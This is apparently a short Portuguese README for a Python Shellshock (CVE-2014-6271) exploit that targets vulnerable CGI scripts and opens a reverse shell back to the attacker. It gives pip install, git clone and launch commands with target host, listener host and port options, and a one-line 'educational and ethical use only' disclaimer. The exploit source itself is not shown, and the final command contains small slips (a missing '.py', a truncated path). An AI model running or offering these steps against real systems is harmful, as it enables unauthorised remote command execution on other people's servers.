
Exploração em Python para CVE-2014-6271 (Shellshock) visando scripts CGI vulneráveis com manipulador de shell reverso, suportando HTTP/HTTPS, caminhos personalizados e proxy.
Este é um exploit em Python para a vulnerabilidade Shellshock (CVE-2014-6271), que afeta o GNU Bash. O exploit tem como alvo scripts CGI em servidores web vulneráveis e estabelece um reverse shell para a máquina do atacante.
CVE-2014-6271
Esta ferramenta destina-se apenas a fins educacionais e éticos.
sudo python3 -m pip install pwntools
sudo python3 -m pip install requests
git clone https://github.com/knightc0de/Shellshock_vuln_Exploit.git
cd Shellshock_vuln_Exploit/
chmod +x CVE-2014-6271.py
python3 CVE-2014-6271 --rhost <target_ip> --lhost <your_ip> --lport <your_port> --pages /cgi-bin/test.cg